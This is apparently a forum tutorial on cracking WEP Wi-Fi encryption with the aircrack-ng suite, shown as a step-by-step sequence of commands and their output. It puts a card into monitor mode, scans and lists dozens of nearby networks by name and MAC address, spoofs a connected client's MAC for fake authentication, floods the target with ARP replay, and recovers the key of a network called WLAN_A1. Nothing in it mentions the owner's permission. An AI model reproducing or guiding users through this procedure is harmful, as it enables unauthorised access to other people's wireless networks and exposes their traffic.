This tutorial will suppose the following:
- Running on a system with BASH interpreter (e.g. Linux)
- Wireless card that supports monitor mode and packet injection (e.g. Atheros chipset) working properly and with adequate drivers (this only matters on Windows)
- Aircrack suite (airmon, airodump, aireplay, aircrack) installed and operational
First thing that we have to do is to set our wireless card into monitor mode. This way we can capture 802.11 packets from other networks, and also inject our own custom packets.
$ sudo airmon-ng stop wlan0
Code: Select all
Interface Chipset Driver
wlan0 Unknown rt2800pci - [phy0]
(monitor mode disabled)
Code: Select all
Interface Chipset Driver
wlan0 Unknown rt2800pci - [phy0]
(monitor mode enabled on mon0)
$ ifconfig mon0
Code: Select all
mon0 Link encap:UNSPEC HWaddr EC-55-F9-B5-96-50-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1937 errors:0 dropped:1937 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:262666 (262.6 KB) TX bytes:0 (0.0 B)
$ sudo airodump-ng mon0
Code: Select all
CH 11 ][ BAT: 1 hour 59 mins ][ Elapsed: 12 s ][ 2011-09-04 01:22
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:68:0C:8D:9C:23 -33 10 1 0 11 54e WPA CCMP PSK JAZZTEL_9C22
00:1A:2B:08:06:63 -70 11 0 0 3 54 WEP WEP WLAN_C2
00:1A:2B:5B:D8:34 -70 8 0 0 11 54 WEP WEP JAZZTEL_0C
00:24:17:18:40:FB -78 9 0 0 11 54 WPA TKIP PSK ORANGE-FB32FA
E8:39:DF:CF:D1:7E -85 2 0 0 3 54e WPA2 CCMP PSK Jazztel_A3
40:4A:03:9E:E4:D0 -83 6 0 0 4 54 . WEP WEP WLAN_25
00:21:63:6B:DA:58 -84 7 0 0 11 54e WPA TKIP PSK VodafoneDA57
40:4A:03:BE:D6:A7 -84 7 58 0 9 54 . WEP WEP WLAN_A1
00:1A:2B:13:98:1C -83 9 0 0 3 54 WEP WEP WLAN_D7
E8:39:DF:CF:D1:7D -84 5 0 0 3 54e WPA2 CCMP PSK Jazztel
00:1D:6A:6C:F4:C3 -85 5 0 0 6 54e. WPA2 CCMP PSK Orange-80f4
62:C7:14:33:18:5C -86 6 0 0 7 54e WPA CCMP PSK vodafoneenrique01
88:25:2C:71:90:98 -86 8 0 0 6 54e. WEP WEP nuria
00:13:49:89:27:7C -87 8 0 0 9 54 . WEP WEP WLAN_91
00:1A:2B:4A:6E:0E -88 8 0 0 11 54 WEP WEP adsuar
00:22:2D:3E:8D:48 -89 8 0 0 11 54e. WEP WEP lucy_david
E0:91:53:49:70:DA -90 9 1 0 10 54 . WEP WEP WLAN_78
00:23:08:E3:C5:34 -90 3 4 0 9 54e. WEP WEP WLAN3C5903
5C:33:8E:E0:63:3A -90 5 0 0 6 54e. WPA2 CCMP PSK Reaviles_Madrid
50:67:F0:88:20:9C -92 5 0 0 7 54 . WEP WEP WLAN_0B
00:1A:2B:08:E4:BB -93 0 0 0 11 54 WEP WEP galapagos
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 40:28:49:55:A8:C2 0 0 - 1 0 11
64:68:0C:8D:9C:23 7C:61:93:E5:6B:5B -40 0 - 5e 0 1
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -70 0 -54 238 61 WLAN_A1
$ sudo airodump-ng --encrypt wep mon0
Code: Select all
CH 10 ][ BAT: 2 hours 2 mins ][ Elapsed: 24 s ][ 2011-09-04 01:23
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1A:2B:5B:D8:34 -70 18 0 0 11 54 WEP WEP JAZZTEL_0C
00:1A:2B:08:06:63 -70 19 0 0 3 54 WEP WEP WLAN_C2
00:1A:2B:13:98:1C -82 19 0 0 3 54 WEP WEP WLAN_D7
40:4A:03:9E:E4:D0 -84 17 0 0 4 54 . WEP WEP WLAN_25
40:4A:03:BE:D6:A7 -84 16 182 0 9 54 . WEP WEP WLAN_A1
00:13:49:89:27:7C -87 13 0 0 9 54 . WEP WEP WLAN_91
88:25:2C:71:90:98 -87 15 0 0 6 54e. WEP WEP nuria
00:22:2D:3E:8D:48 -87 10 0 0 11 54e. WEP WEP lucy_david
00:1A:2B:4A:6E:0E -88 11 0 0 11 54 WEP WEP adsuar
00:23:08:E3:C5:34 -89 4 0 0 9 54e. WEP WEP WLAN3C5903
E0:91:53:49:70:DA -90 7 0 0 10 54 . WEP WEP WLAN_78
64:68:0C:6C:9C:11 -92 2 0 0 6 54 WEP WEP Wireless Jazztel
50:67:F0:88:20:9C -92 4 0 0 7 54 . WEP WEP WLAN_0B
00:1A:2B:08:E4:BB -93 6 0 0 11 54 WEP WEP galapagos
00:60:4C:98:61:89 -95 2 0 0 6 54 . WEP WEP adsl4917
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -72 0 -54 240 181
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0
Code: Select all
CH 9 ][ BAT: 2 hours 3 mins ][ Elapsed: 8 s ][ 2011-09-04 01:27
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:4A:03:BE:D6:A7 -88 6 74 475 44 9 54 . WEP WEP WLAN_A1
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -70 0 -54 99 473
$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0
Code: Select all
CH 9 ][ BAT: 1 hour 57 mins ][ Elapsed: 8 s ][ 2011-09-04 01:30
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:4A:03:BE:D6:A7 -88 7 91 519 47 9 54 . WEP WEP WLAN_A1
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E -70 0 -54 74 519
$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0
Code: Select all
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:33:27 Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
01:33:27 Sending Authentication Request (Open System)
01:33:27 Authentication successful
01:33:27 Sending Association Request
01:33:27 Association successful :-) (AID: 1)
[ACK]
$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0
Code: Select all
The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:36:45 Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
Saving ARP requests in replay_arp-0904-013645.cap
You should also start airodump-ng to capture replies.
Read 5291 packets (got 1485 ARP requests and 229 ACKs), sent 2742 packets...(500 pps)
Code: Select all
CH 9 ][ BAT: 1 hour 9 mins ][ Elapsed: 8 mins ][ 2011-09-04 01:38
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
40:4A:03:BE:D6:A7 -84 45 4072 34576 361 9 54 . WEP WEP OPN WLAN_A1
BSSID STATION PWR Rate Lost Packets Probes
40:4A:03:BE:D6:A7 E0:B9:A5:66:F7:9E 0 24 - 1 8121 81946 WLAN_A1
$ aircrack-ng -c WLAN_A1-01.ivs
Code: Select all
Opening WLAN_A1-01.ivs
Read 51527 packets.
# BSSID ESSID Encryption
1 40:4A:03:BE:D6:A7 WLAN_A1 WEP (51526 IVs)
Choosing first network as target.
Opening WLAN_A1-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 51738 ivs.
Aircrack-ng 1.1 r1904
[00:00:00] Tested 37 keys (got 30056 IVs)
KB depth byte(vote)
0 0/ 2 5A(42752) 7D(36608) 9E(36608) E6(36608) ED(36352) 64(36096) 7F(36096) 0B(35840) 3F(35584) 89(35584) 66(35072) 6D(35072) 2F(34816)
1 7/ 8 6B(36352) 62(35584) 03(35328) 29(35328) 70(35072) 7A(34816) A2(34816) A7(34816) 0D(34560) 32(34560) 8C(34560) 1E(34304) CA(34304)
2 3/ 2 8D(36096) 33(35840) 90(35840) 1C(35072) 2D(35072) BB(35072) FF(35072) 0C(34816) 53(34816) D0(34816) 9C(34560) AB(34560) 23(34304)
3 4/ 3 C0(36864) A2(35840) AF(35840) 30(35584) 36(35584) 31(35328) 79(35072) 2A(34816) 2D(34560) 55(34560) 14(34304) 4F(34304) FA(34304)
4 0/ 2 33(45568) 69(39680) E3(36096) 0E(35328) 13(35328) 23(35328) 80(35328) B4(35328) E4(35328) 92(35072) 9C(35072) 0F(34816) 87(34816)
KEY FOUND! [ 5A:34:30:34:41:30:33:43:35:30:45:41:31 ] (ASCII: Z404A03C50EA1 )
Decrypted correctly: 100%
Hope this was useful for you, see you!